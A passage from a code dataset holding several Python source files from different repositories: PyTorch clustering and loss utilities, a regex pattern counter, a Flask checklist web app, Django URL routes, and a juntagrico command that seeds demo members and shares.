x[idx]\n                tmp[idx] = 1\n\n            # otherwise, update the center of the current cluster based on all data points assigned to this cluster\n            else:\n                xj = x[index]\n                c = xj.mean(0)\n                clusters[j] = c / c.norm()\n\n        # stop k-Means if the difference in the cluster center is below the tolerance (i.e. the algorithm converged)\n        if torch.abs(prev_sim - sim_mean) / (torch.abs(sim_mean) + 1e-20) < tol:\n            break\n        prev_sim = sim_mean\n\n    return clusters\n\n\ndef kmeans(\n    x: torch.Tensor,\n    n_clusters: int,\n    distance: str = \"euclidean\",\n    max_iters: int = 100,\n    verbose: bool = True,\n    init: str = None,\n    tol: float = 1e-4,\n    use_cuda: bool = False,\n):\n    r\"\"\"Wrapper for the k-Means clustering algorithm to utilize either GPU or CPU resources.\n    We always recommend to use the well-tested scikit-learn implementation (i.e. set\n    'use_cuda' to False) unless there is an important reason to utilize GPU.\n\n    Parameters\n    ----------\n    x : Tensor\n        Data that will be used for clustering provided as a tensor of shape\n        (n_samples x n_dimensions).\n    n_clusters : int\n        Number of clusters that will be computed.\n    distance : str\n        Distance measure used for clustering. Defaults to 'euclidean'.\n    max_iters : int\n        Maximal number of iterations used in the K-Means clustering. Defaults to 100.\n    verbose : bool\n        Flag to activate verbose output. Defaults to True.\n    init : str\n        Initialization process for the K-Means algorithm. Defaults to None.\n    tol : float\n        Relative tolerance with regards to Frobenius norm of the difference in the cluster\n        centers of two consecutive iterations to declare convergence. It's not advised to set\n        `tol=0` since convergence might never be declared due to rounding errors. Use a very\n        small number instead. Defaults to 1e-4.\n    use_cuda : bool\n        Determine whether to utilize GPU resources or compute kmeans on CPU resources. If set to\n        False, scikit-learn's implementation of kmeans will be used. Defaults to False.\n    \n    Returns\n    -------\n    clusters : Tensor\n        Tensor that contains the cluster centers, i.e. result of the K-Means algorithm. 
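One assign/update round of the Lloyd loop above, written out in NumPy for the Euclidean case; the points and starting centers are hypothetical:

.. code-block:: python

    import numpy as np

    x = np.array([[0.0, 0.0], [0.0, 1.0], [10.0, 10.0]])
    clusters = np.array([[0.0, 0.5], [9.0, 9.0]])
    dist = np.linalg.norm(x[:, None, :] - clusters[None, :, :], axis=2)  # (n, k)
    assign = dist.argmin(axis=1)                       # nearest center per point
    clusters = np.stack([x[assign == j].mean(axis=0) for j in range(len(clusters))])
    print(assign, clusters)  # [0 0 1] [[ 0.   0.5] [10.  10. ]]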
The shape of\n        the tensor is (n_clusters x n_dimensions).\n    \"\"\"\n    # use GPU implementation if use_cuda was set to true\n    if use_cuda:\n        clusters = kmeans_gpu(x, n_clusters, distance, max_iters, verbose, init, tol)\n\n    # otherwise, cast Tensors to numpy arrays and use scikit-learn's implementation of kmeans\n    else:\n        aux_x = x.cpu().numpy()\n        sklearn_kmeans = KMeans(\n            n_clusters=n_clusters,\n            init=init,\n            max_iter=max_iters,\n            tol=tol,\n            verbose=int(verbose),\n            algorithm=\"full\",\n        ).fit(aux_x)\n\n        clusters = torch.Tensor(sklearn_kmeans.cluster_centers_)\n\n        # make sure that the cluster centers are on the GPU if the input is on the GPU\n        if x.is_cuda:\n            clusters = clusters.cuda()\n\n    return clusters\n\n\ndef sample_data(\n    data_loader: torch.utils.data.DataLoader, n_features: int, n_samples: int = 100000\n):\n    r\"\"\"Utility function that returns a specified number of samples as a tensor. The samples will\n    be taken from a specified PyTorch DataLoader object.\n\n    Parameters\n    ----------\n    data_loader : torch.utils.data.DataLoader\n        PyTorch DataLoader object that handles access to training data. In general, other objects \n        can be used to access the data. The only prerequisite is that it is possible to retrieve\n        the data and label as PyTorch Tensors when iterated over the object. We strongly recommend\n        to use a PyTorch DataLoader object.\n    n_features : int\n        Number of features in the data set. In other words, the data set consists of data points\n        with n_features dimensions.\n    n_samples : int\n        Number of data points that will be sampled from the data.\n\n    Returns\n    -------\n    samples : Tensor\n        Tensor containing the sampled data points.\n    \"\"\"\n    # initialize the Tensor that stores all sampled data points\n    samples = torch.zeros(n_samples, n_features)\n\n    # determine the number of data points sampled per batch\n    # -> we make sure that we sample at least 500 data points per batch to reduce runtime\n    n_samples_per_batch = max(\n        (n_samples + len(data_loader) - 1) // len(data_loader), 500\n    )\n\n    # iterate over the data set\n    already_sampled = 0\n    for data, _ in data_loader:\n        # stop if already enough data points have been sampled\n        if already_sampled >= n_samples:\n            break\n\n        # make sure to sample at most the number of data points in the current batch\n        max_samples_per_batch = min(data.size(0), n_samples_per_batch)\n\n        # sample random indices of the data Tensor (number of sampled indices is either the\n        # maximum number of data points or n_samples_per_batch, whatever is smaller)\n        indices = torch.randperm(data.size(0))[:max_samples_per_batch]\n        current_samples = data[indices]\n\n        # only use a subset of the sampled data points in this batch, if this batch would\n        # exceed the maximum number of samples\n        current_size = current_samples.size(0)\n        if already_sampled + current_size > n_samples:\n            current_size = n_samples - already_sampled\n            current_samples = current_samples[:current_size]  # truncate the batch to the remaining quota\n\n        # update the samples Tensor with the current batch of sampled data points\n        samples[already_sampled : already_sampled + current_size] = current_samples\n        already_sampled += current_size\n\n    # return the sampled data points\n    print(f\"sample_data routine returned {already_sampled} sampled data points\")\n    return samples[:already_sampled, :]\n\n\ndef sample_data_multiomics(\n    data_loader: torch.utils.data.DataLoader, n_features: list, n_samples: int = 100000\n):\n    r\"\"\"Data sampling utility function that is specially designed for multi-omics datasets.\n\n    Parameters\n    ----------\n    data_loader : 
torch.utils.data.DataLoader\n        PyTorch DataLoader object that handles access to training data. In general, other objects \n        can be used to access the data. The only prerequisite is that it is possible to retrieve\n        the data and label as PyTorch Tensors when iterated over the object. We strongly recommend\n        to use a PyTorch DataLoader object.\n    n_features : list of int\n        Number of features per data type. In other words, the i-th data type consists of data points\n        with n_features[i] dimensions.\n    n_samples : int\n        Number of data points that will be sampled from the data.\n\n    Returns\n    -------\n    samples : list\n        List of tensors containing the sampled data points.\n    \"\"\"\n    # initialize the tensors that will store the samples\n    samples = []\n    for n_f in n_features:\n        samples.append(torch.zeros(n_samples, n_f))\n\n    # determine the number of data points sampled per batch\n    # -> we make sure that we sample at least 500 data points per batch to reduce runtime\n    n_samples_per_batch = max(\n        (n_samples + len(data_loader) - 1) // len(data_loader), 500\n    )\n\n    # iterate over the dataset\n    already_sampled = 0\n    for data, _ in data_loader:\n        # stop if already enough data points have been sampled\n        if already_sampled >= n_samples:\n            break\n\n        # iterate over all data types and sample independently for all\n        current_size = 0\n        for i in range(len(n_features)):\n            # make sure to sample at most the number of data points in the current batch\n            max_samples_per_batch = min(data[i].size(0), n_samples_per_batch)\n\n            # sample random indices of the data Tensor (number of sampled indices is either the\n            # maximum number of data points or n_samples_per_batch, whatever is smaller)\n            indices = torch.randperm(data[i].size(0))[:max_samples_per_batch]\n            current_samples = data[i][indices]\n\n            # only use a subset of the sampled data points in this batch, if this batch would\n            # exceed the maximum number of samples\n            current_size = current_samples.size(0)\n            if already_sampled + current_size > n_samples:\n                current_size = n_samples - already_sampled\n                current_samples = current_samples[:current_size]  # truncate the batch to the remaining quota\n\n            # update the samples Tensor with the current batch of sampled data points\n            samples[i][\n                already_sampled : already_sampled + current_size\n            ] = current_samples\n\n        already_sampled += current_size\n\n    # return the sampled data points\n    print(f\"sample_data routine returned {already_sampled} sampled data points\")\n    return [s[:already_sampled, :] for s in samples]\n\n\ndef category_from_output(output):\n    r\"\"\"This auxiliary function returns the class with highest probability from\n    a network's output.\n\n    Parameters\n    ----------\n    output : Tensor\n        Output of a PyTorch model.\n    \n    Returns\n    -------\n    category_i : int\n        Index of the category with the highest probability.\n    \"\"\"\n    top_n, top_i = output.topk(1)\n    category_i = top_i[0].item()\n    return category_i\n\n\ndef recall_at_fdr(y_true, y_score, fdr_cutoff=0.05):\n    r\"\"\"Compute recall at certain false discovery rate cutoffs\n    \"\"\"\n    # convert y_true and y_score into desired format\n    # -> both have to be lists of shape [nb_samples]\n    if len(y_true.shape) > 1:\n        y_true_new = y_true.argmax(axis=1)\n    else:\n        y_true_new = y_true\n    if len(y_score.shape) > 1:\n        y_score_new = [y_score[j][i] for j, i in enumerate(y_true_new)]\n    else:\n        y_score_new = y_score\n    precision, recall, _ = precision_recall_curve(y_true_new, y_score_new)\n    fdr = 1 - precision\n    cutoff_index = next(i for i, x in enumerate(fdr) if x <= fdr_cutoff)\n    return recall[cutoff_index]\n\n\ndef compute_metrics_classification(y_true, 
y_pred):\n    r\"\"\"Compute standard performance metrics for predictions of a trained model.\n    \n    Parameters\n    ----------\n    y_true : Tensor\n        True value for each sample provided as a tensor of shape (n_sample).\n    y_pred : Tensor\n        Predicted value for each sample provided as a tensor of shape (n_samples).\n    \n    Returns\n    -------\n    df_metric : pandas.DataFrame\n        Different performance metrics for the provided predictions as a Pandas DataFrame.\n    \"\"\"\n    y_true, y_pred = np.asarray(y_true), np.asarray(y_pred)\n\n    metric = {}\n    metric[\"log.loss\"] = log_loss(y_true, y_pred)\n    metric[\"accuracy\"] = accuracy_score(y_true, y_pred > 0.5)\n\n    # check for multiclass classification\n    if len(y_true.shape) > 1 and len(y_pred.shape) > 1:\n        metric[\"F_score\"] = f1_score(y_true.argmax(axis=1), y_pred.argmax(axis=1))\n        metric[\"MCC\"] = matthews_corrcoef(y_true.argmax(axis=1), y_pred.argmax(axis=1))\n    else:\n        metric[\"F_score\"] = f1_score(y_true, y_pred > 0.5)\n        metric[\"MCC\"] = matthews_corrcoef(y_true, y_pred > 0.5)\n\n    metric[\"auROC\"] = roc_auc_score(y_true, y_pred)\n    metric[\"auROC50\"] = roc_auc_score(y_true, y_pred, max_fpr=0.5)\n    metric[\"auPRC\"] = average_precision_score(y_true, y_pred)\n    metric[\"recall_at_10_fdr\"] = recall_at_fdr(y_true, y_pred, 0.10)\n    metric[\"recall_at_5_fdr\"] = recall_at_fdr(y_true, y_pred, 0.05)\n    metric[\"pearson.r\"], metric[\"pearson.p\"] = stats.pearsonr(\n        y_true.ravel(), y_pred.ravel()\n    )\n    metric[\"spearman.r\"], metric[\"spearman.p\"] = stats.spearmanr(\n        y_true, y_pred, axis=None\n    )\n\n    df_metric = pd.DataFrame.from_dict(metric, orient=\"index\")\n    df_metric.columns = [\"value\"]\n    df_metric.sort_index(inplace=True)\n\n    return df_metric\n\n\ndef compute_metrics_regression(y_true, y_pred):\n    r\"\"\"Compute standard regression performance metrics for predictions of a trained model.\n    \n    Parameters\n    ----------\n    y_true : Tensor\n        True value for each sample provided as a tensor of shape (n_sample).\n    y_pred : Tensor\n        Predicted value for each sample provided as a tensor of shape (n_samples).\n    \n    Returns\n    -------\n    df_metric : pandas.DataFrame\n        Different performance metrics for the provided predictions as a Pandas DataFrame.\n    \"\"\"\n    raise NotImplementedError(\"compute_metrics_regression is not implemented yet!\")\n\n\nclass ClassBalanceLoss(torch.nn.Module):\n    r\"\"\"Implementation of the Class-Balance Loss\n\n    Reference: Yin Cui, Menglin Jia, Tsung-Yi Lin, Yang Song, Serge Belongie; Proceedings of the \n    IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR), 2019, pp. 9268-9277\n    \"\"\"\n\n    def __init__(\n        self, samples_per_cls, no_of_classes, loss_type, beta, gamma, reduction=\"mean\"\n    ):\n        r\"\"\"Constructor of the class-balance loss class\n\n        Parameters\n        ----------\n        samples_per_cls : list of int\n            List containing the number of samples per class in the dataset.\n        no_of_classes : int\n            Number of classes in the classification problem.\n        loss_type : str\n            Loss function used for the class-balance loss.\n        beta : float\n            Hyperparameter for class-balanced loss.\n        gamma : float\n            Hyperparameter for Focal loss\n\n        Raises\n        ------\n        ValueError: If len(samples_per_cls) != no_of_classes\n        \"\"\"\n        # call constructor of parent class\n        super(ClassBalanceLoss, self).__init__()\n\n        # check whether the parameters are valid; set the binary flag in every\n        # branch so that forward() can always read it\n        self.binary = no_of_classes == 1\n        if not self.binary and len(samples_per_cls) != no_of_classes:\n            raise ValueError(\n                \"Dimensionality of first argument expected to be {}. 
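recall_at_fdr above walks the precision-recall curve and reports recall at the first point whose false discovery rate (1 - precision) meets the cutoff. A tiny check with toy labels:

.. code-block:: python

    from sklearn.metrics import precision_recall_curve

    y_true = [0, 0, 1, 1]
    y_score = [0.1, 0.4, 0.35, 0.8]
    precision, recall, _ = precision_recall_curve(y_true, y_score)
    fdr = 1 - precision
    print(next(r for r, f in zip(recall, fdr) if f <= 0.5))  # 1.0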
Found {} instead!\".format(\n no_of_classes, len(samples_per_cls)\n )\n )\n\n # store user-specified parameters\n self.samples_per_cls = samples_per_cls\n self.no_of_classes = no_of_classes\n self.loss_type = loss_type\n self.beta = beta\n self.gamma = gamma\n self.reduction = reduction\n\n effective_num = 1.0 - np.power(self.beta, self.samples_per_cls)\n weights = (1.0 - self.beta) / np.array(effective_num)\n weights = weights / np.sum(weights) * self.no_of_classes\n print(weights)\n\n def one_hot(self, labels, num_classes, device, dtype=None, eps=1e-6):\n r\"\"\"Convert an integer label x-D tensor to a one-hot (x+1)-D tensor. Implementation by Kornia\n (https://github.com/kornia).\n\n Parameters\n ----------\n labels : torch.Tensor\n Tensor with labels of shape :math:`(N, *)`, where N is batch size. Each value \n is an integer representing correct classification.\n num_classes : int\n Number of classes in labels.\n device : str \n The desired device of returned tensor.\n dtype : torch.dtype\n The desired data type of returned tensor.\n \n Returns\n -------\n one_hot : torch.Tensor\n The labels in one hot tensor of shape :math:`(N, C, *)`,\n \n Examples\n --------\n >>> labels = torch.LongTensor([[[0, 1], [2, 0]]])\n >>> one_hot(labels, num_classes=3)\n tensor([[[[1.0000e+00, 1.0000e-06],\n [1.0000e-06, 1.0000e+00]],\n \n [[1.0000e-06, 1.0000e+00],\n [1.0000e-06, 1.0000e-06]],\n \n [[1.0000e-06, 1.0000e-06],\n [1.0000e+00, 1.0000e-06]]]])\n \"\"\"\n if not isinstance(labels, torch.Tensor):\n raise TypeError(\n f\"Input labels type is not a torch.Tensor. Got {type(labels)}\"\n )\n\n if not labels.dtype == torch.int64:\n raise ValueError(\n f\"labels must be of the same dtype torch.int64. Got: {labels.dtype}\"\n )\n\n if num_classes < 1:\n raise ValueError(\n \"The number of classes must be bigger than one.\"\n \" Got: {}\".format(num_classes)\n )\n\n shape = labels.shape\n one_hot = torch.zeros(\n (shape[0], num_classes) + shape[1:], device=device, dtype=dtype\n )\n\n return one_hot.scatter_(1, labels.unsqueeze(1), 1.0) + eps\n\n def focal_loss(self, input, target, alpha, gamma=2.0, reduction=\"none\", eps=None):\n r\"\"\"Criterion that computes Focal loss. \n \n Implementation by Kornia (https://github.com/kornia).\n\n Reference: Lin, Tsung-Yi, et al. \"Focal loss for dense object detection.\" \n Proceedings of the IEEE international conference on computer vision. 2017.\n \n According to Lin et al., the Focal loss is computed as \n :math:`\\text{FL}(p_t) = -\\alpha_t (1 - p_t)^{\\gamma} \\, \\log (p_t)`\n where :math:`p_t` is the model's estimated probability for each class.\n \n Parameters\n ----------\n input: torch.Tensor\n Logits tensor with shape :math:`(N, C, *)` where C = number of classes.\n target: torch.Tensor\n Labels tensor with shape :math:`(N, *)` where each value is :math:`0 ≤ targets[i] ≤ C−1`.\n alpha: float\n Weighting factor :math:`\\alpha \\in [0, 1]`.\n gamma: float\n Focusing parameter :math:`\\gamma >= 0`.\n reduction: str\n Specifies the reduction to apply to the output: ``'none'`` | ``'mean'`` | \n ``'sum'``. ``'none'``: no reduction will be applied, ``'mean'``: the sum of \n the output will be divided by the number of elements in the output, ``'sum'``: \n the output will be summed.\n eps: float\n (Deprecated) Scalar to enforce numerical stabiliy. 
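The weighting used throughout ClassBalanceLoss follows Cui et al. (2019): a class with n samples has an "effective number" of (1 - beta**n) / (1 - beta), and classes are weighted by its inverse, normalised to sum to the number of classes, so rare classes are up-weighted. A numeric check with hypothetical class counts:

.. code-block:: python

    import numpy as np

    samples_per_cls, beta = np.array([900, 100]), 0.999
    effective_num = 1.0 - np.power(beta, samples_per_cls)
    weights = (1.0 - beta) / effective_num
    weights = weights / weights.sum() * len(samples_per_cls)
    print(weights.round(3))  # [0.276 1.724] -- the rare class dominates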
This is no longer used.\n \n Returns\n -------\n loss : torch.Tensor\n The computed loss.\n \n Examples\n --------\n >>> N = 5 # num_classes\n >>> input = torch.randn(1, N, 3, 5, requires_grad=True)\n >>> target = torch.empty(1, 3, 5, dtype=torch.long).random_(N)\n >>> output = focal_loss(input, target, alpha=0.5, gamma=2.0, reduction='mean')\n >>> output.backward()\n \"\"\"\n if eps is not None and not torch.jit.is_scripting():\n warnings.warn(\n \"`focal_loss` has been reworked for improved numerical stability \"\n \"and the `eps` argument is no longer necessary\",\n DeprecationWarning,\n stacklevel=2,\n )\n\n if not isinstance(input, torch.Tensor):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not len(input.shape) >= 2:\n raise ValueError(\n f\"Invalid input shape, we expect BxCx*. Got: {input.shape}\"\n )\n\n if input.size(0) != target.size(0):\n raise ValueError(\n f\"Expected input batch_size ({input.size(0)}) to match target batch_size ({target.size(0)}).\"\n )\n\n n = input.size(0)\n out_size = (n,) + input.size()[2:]\n if target.size()[1:] != input.size()[2:]:\n raise ValueError(f\"Expected target size {out_size}, got {target.size()}\")\n\n if not input.device == target.device:\n raise ValueError(\n f\"input and target must be in the same device. Got: {input.device} and {target.device}\"\n )\n\n # compute softmax over the classes axis\n input_soft: torch.Tensor = F.softmax(input, dim=1)\n log_input_soft: torch.Tensor = F.log_softmax(input, dim=1)\n\n # create the labels one hot tensor\n target_one_hot: torch.Tensor = self.one_hot(\n target, num_classes=input.shape[1], device=input.device, dtype=input.dtype\n )\n\n # compute the actual focal loss\n weight = torch.pow(-input_soft + 1.0, gamma)\n\n focal = -alpha * weight * log_input_soft\n loss_tmp = torch.einsum(\"bc...,bc...->b...\", (target_one_hot, focal))\n\n if reduction == \"none\":\n loss = loss_tmp\n elif reduction == \"mean\":\n loss = torch.mean(loss_tmp)\n elif reduction == \"sum\":\n loss = torch.sum(loss_tmp)\n else:\n raise NotImplementedError(f\"Invalid reduction mode: {reduction}\")\n return loss\n\n def forward(self, logits, labels):\n r\"\"\"Compute the Class Balanced Loss between `logits` and the ground truth `labels`.\n Class Balanced Loss: ((1-beta)/(1-beta^n))*Loss(labels, logits) where Loss is one of the standard losses used\n for Neural Networks.\n \n Parameters\n ----------\n logits : torch.Tensor\n Output of the network given as a tensor of shape (batch_size x num_classes).\n labels : torch.Tensor\n True label of each sample given as a tensor of shape (batch_size x num_classes).\n \n Returns\n -------\n cb_loss : torch.Tensor\n A float tensor representing class balanced loss.\n \n Raises\n ------\n ValueError: If an unknown loss function was specified during initialization of the ClassBalanceLoss object.\n \"\"\"\n if self.binary:\n effective_num = 1.0 - np.power(self.beta, self.samples_per_cls)\n weights = (1.0 - self.beta) / np.array(effective_num)\n weights = weights / np.sum(weights)\n\n weights_tensor = torch.tensor(weights[1])\n labels_one_hot = labels\n else:\n effective_num = 1.0 - np.power(self.beta, self.samples_per_cls)\n weights = (1.0 - self.beta) / np.array(effective_num)\n weights = weights / np.sum(weights) * self.no_of_classes\n\n labels_one_hot = F.one_hot(labels, self.no_of_classes).float()\n\n # we need to adapt the dimensionality of logits if the batch size is 1\n # -> otherwise logits and labels_one_hot have mismatching dimensionality\n if 
labels_one_hot.shape[0] == 1:\n            logits = logits.view_as(labels_one_hot)\n\n            weights_tensor = labels_one_hot.new_tensor(weights)\n            weights_tensor = weights_tensor.unsqueeze(0)\n            weights_tensor = (\n                weights_tensor.repeat(labels_one_hot.shape[0], 1) * labels_one_hot\n            )\n            weights_tensor = weights_tensor.sum(1)\n            weights_tensor = weights_tensor.unsqueeze(1)\n            weights_tensor = weights_tensor.repeat(1, self.no_of_classes)\n\n        if self.loss_type == \"focal\":\n            # argument order fixed to match focal_loss(input, target, alpha, ...):\n            # logits first, integer class labels second (see one_hot above)\n            cb_loss = self.focal_loss(\n                logits, labels, weights_tensor, gamma=self.gamma, reduction=self.reduction\n            )\n        elif self.loss_type == \"sigmoid\":\n            cb_loss = F.binary_cross_entropy_with_logits(\n                input=logits,\n                target=labels_one_hot,\n                pos_weight=weights_tensor,\n                reduction=self.reduction,\n            )\n        elif self.loss_type == \"softmax\":\n            pred = logits.softmax(dim=1)\n            cb_loss = F.binary_cross_entropy(\n                input=pred,\n                target=labels_one_hot,\n                weight=weights_tensor,\n                reduction=self.reduction,\n            )\n        elif self.loss_type == \"cross_entropy\":\n            cb_loss = F.cross_entropy(\n                input=logits,\n                target=labels,\n                weight=torch.tensor(weights).float(),\n                reduction=self.reduction,\n            )\n        else:\n            raise ValueError(\n                \"Undefined loss function: {}.\".format(self.loss_type)\n                + \"\\n Valid values are 'focal', 'sigmoid', 'softmax', and 'cross_entropy'.\"\n            )\n\n        return cb_loss\n","repo_name":"jditz/comics","sub_path":"comic/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":31965,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"19457807241","text":"import sys\r\nimport re\r\n\r\n\r\ndef search(string, pattern):\r\n    string = ''.join(string.split(','))\r\n    pattern = ''.join(pattern.split(','))\r\n    searched = re.findall('(?=(' + pattern + '))', string)\r\n    return len(searched)\r\n\r\n\r\ndef main():\r\n    if len(sys.argv) != 3:\r\n        print('Your input is invalid!')\r\n        sys.exit()\r\n    else:\r\n        print('Pattern appears %s time(s)!' 
% search(*sys.argv[1:]))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"mcdulltii/coding","sub_path":"SIT/Python/PatternSearching.py","file_name":"PatternSearching.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73617365314","text":"import logging\nfrom flask import render_template, Flask, send_from_directory, jsonify,\\\n url_for, redirect, request\nfrom flask_login import login_required, current_user\nfrom flask_classy import FlaskView, route\nfrom models.check import Check\nfrom models.category import Category\nfrom auth import register_auth\n\napp = Flask(__name__)\n\n\nlogging.basicConfig(\n level=logging.INFO,\n filename='/tmp/checkme.log',\n format='%(asctime)s %(name)s %(levelname)s %(message)s'\n)\n\n\nclass MainView(FlaskView):\n\n @login_required\n def index(self):\n return render_template('index.html', current_user=current_user)\n\n @route('/static/')\n @login_required\n def serve_static(self, filename):\n return send_from_directory(\n 'static',\n filename\n )\n\n\nclass CheckView(FlaskView):\n\n @login_required\n def get(self, categoryId):\n checks = Check.select().where(\n (Check.status == 'P') & (Check.category == int(categoryId))\n )\n return jsonify({'data': [x.to_json() for x in checks]})\n\n @login_required\n def check(self, checkId, check):\n c = Check.get(id=int(checkId))\n c.check = True if check == '1' else False\n c.save()\n return jsonify({'status': 'OK'})\n\n @login_required\n def cross(self, checkId, cross):\n c = Check.get(id=int(checkId))\n c.cross = True if cross == '1' else False\n c.save()\n return jsonify({'status': 'OK'})\n\n @login_required\n def post(self):\n\n Check(\n text=request.json['text'],\n category=Category.get(id=request.json['categoryId'])\n ).save()\n return jsonify({'status': 'OK'})\n\n @login_required\n def archive(self, categoryId):\n Check.archive(int(categoryId))\n return redirect(url_for('CheckView:get', categoryId=categoryId))\n\n @login_required\n def priority(self, checkId, priority):\n check = Check.get(id=int(checkId))\n check.priority = int(priority)\n check.save()\n return jsonify({'status': 'OK'})\n\n\nclass CategoryView(FlaskView):\n\n @login_required\n def all(self):\n categories = Category.select().where(Category.user == current_user.id)\n return jsonify({'data': [x.to_json() for x in categories]})\n\n @login_required\n def new(self, text):\n Category(text=text, user=current_user.id).save()\n return jsonify({'status': 'OK'})\n\n\nMainView.register(app)\nCheckView.register(app)\nCategoryView.register(app)\n\nregister_auth(app)\n\napp.config[\"SECRET_KEY\"] = 'Super Check Admin Key'\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n","repo_name":"eregnier/checkme","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22911786073","text":"from django.conf.urls import url, include\n\nfrom .views import PageViewSet\n\npage_list = PageViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\npage_detail = PageViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\n\nurlpatterns = [\n url(r'^pages/$', page_list, name=\"page-list\"),\n #url(r'^pages/root/$', page_detail, name=\"page-list\"),\n url(r'^pages/(?P\\w+)/$', page_detail, 
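The zero-width lookahead built in search() above is what makes the count include overlapping occurrences, which a plain findall on the pattern would miss:

.. code-block:: python

    import re

    print(len(re.findall('(?=(aa))', 'aaaa')))  # 3 overlapping matches
    print(len(re.findall('aa', 'aaaa')))        # 2 non-overlapping matches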
name='page-detail'),\n]\n","repo_name":"zyrobin/book_exercise-ExtJsApplicationDevelopment-Blueprints","sub_path":"djangoproject/ext6project/architecturecms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28909286266","text":"from django.urls import path\nfrom . import views\n\n\napp_name = \"images\"\nurlpatterns = [\n    path(\n        '', \n        view=views.Images.as_view(), \n        name=\"feed\"\n    ),\n    path(\n        '<int:image_id>/',\n        view = views.ImageDetail.as_view(),\n        name = \"image_detail\"\n    ),\n    path(\n        '<int:image_id>/likes/',\n        view=views.LikeImage.as_view(),\n        name='like_image'\n    ),\n    path(\n        '<int:image_id>/unlikes/',\n        view=views.UnLikeImage.as_view(),\n        name='unlike_image'\n    ), \n    path(\n        '<int:image_id>/comments/',\n        view=views.CreateCommentOnImage.as_view(),\n        name='create_comment'\n    ),\n    path(\n        '<int:image_id>/comments/<int:comment_id>/',\n        view=views.ModerateCommentOnImage.as_view(),\n        name='moderate_comment'\n    ), \n    path(\n        'comments/<int:comment_id>/',\n        view=views.DeleteCommentOnImage.as_view(),\n        name='delete_comment'\n    ),\n    path(\n        'search/',\n        view=views.Search.as_view(),\n        name='search'\n    ), \n]\n\n","repo_name":"soulmecca/savitreact","sub_path":"savitreact/images/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14767692648","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django import utils\r\nfrom django.core.management.base import BaseCommand\r\nfrom juntagrico import models as jm\r\nfrom juntagrico.entity import subtypes as st\r\nfrom juntagrico.entity.billing import ExtraSubBillingPeriod\r\nfrom juntagrico.entity.depot import Depot\r\nfrom juntagrico.entity.extrasubs import ExtraSubscriptionCategory, ExtraSubscriptionType\r\nfrom juntagrico.entity.jobs import ActivityArea, JobType\r\nfrom juntagrico.util import management as ja_mgmt\r\n\r\nfrom juntagrico_custom_sub import models as csm\r\n\r\n\r\nclass Command(BaseCommand):\r\n\r\n    # entry point used by manage.py\r\n    def handle(self, *args, **options):\r\n        mem1_fields = {\r\n            \"first_name\": \"Boro\",\r\n            \"last_name\": \"Sadler\",\r\n            \"email\": \"boro@juntagrico.ch\",\r\n            \"addr_street\": \"Mühlezelgstrasse 1\",\r\n            \"addr_zipcode\": \"8047\",\r\n            \"addr_location\": \"Zürich\",\r\n            \"birthday\": \"2017-03-27\",\r\n            \"phone\": \"079 123 45 99\",\r\n            \"mobile_phone\": \"\",\r\n            \"confirmed\": True,\r\n            \"reachable_by_email\": False,\r\n            \"inactive\": False,\r\n        }\r\n        mem2_fields = {\r\n            \"first_name\": \"Deepak\",\r\n            \"last_name\": \"Olvirsson\",\r\n            \"email\": \"deepak@juntagico.ch\",\r\n            \"addr_street\": \"Otto-Lang-Weg 1\",\r\n            \"addr_zipcode\": \"8044\",\r\n            \"addr_location\": \"Zürich\",\r\n            \"birthday\": \"2017-03-27\",\r\n            \"phone\": \"079 123 45 99\",\r\n            \"mobile_phone\": \"\",\r\n            \"confirmed\": True,\r\n            \"reachable_by_email\": False,\r\n            \"inactive\": False,\r\n        }\r\n        member_1 = jm.Member.objects.create(**mem1_fields)\r\n        member_2 = jm.Member.objects.create(**mem2_fields)\r\n        share_all_fields = {\r\n            \"member\": member_1,\r\n            \"paid_date\": \"2017-03-27\",\r\n            \"issue_date\": \"2017-03-27\",\r\n            \"booking_date\": None,\r\n            \"cancelled_date\": None,\r\n            \"termination_date\": None,\r\n            \"payback_date\": None,\r\n            \"number\": None,\r\n            \"notes\": \"\",\r\n        }\r\n        jm.Share.objects.create(**share_all_fields)\r\n        jm.Share.objects.create(**share_all_fields)\r\n        share_all_fields[\"member\"] = member_2\r\n        jm.Share.objects.create(**share_all_fields)\r\n        
